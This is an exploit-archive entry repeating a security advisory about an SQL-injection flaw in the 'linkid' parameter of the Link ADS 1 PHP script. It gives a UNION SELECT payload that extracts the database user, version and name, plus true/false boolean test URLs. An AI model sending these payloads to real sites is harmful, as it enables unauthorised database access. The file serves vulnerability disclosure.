exploit-db-mirror/platforms/php/webapps/31963.txt
Offensive Security 37e7d441f8 Updated 03_01_2014
2014-03-01 04:27:47 +00:00

10 lines
No EOL
617 B
Text
Executable file

source: http://www.securityfocus.com/bid/29923/info
Link ADS 1 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/Script/out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11--
http://www.example.com/out.php?linkid=50+and+1=1 (true)
http://www.example.com/out.php?linkid=50+and+1=2 (false)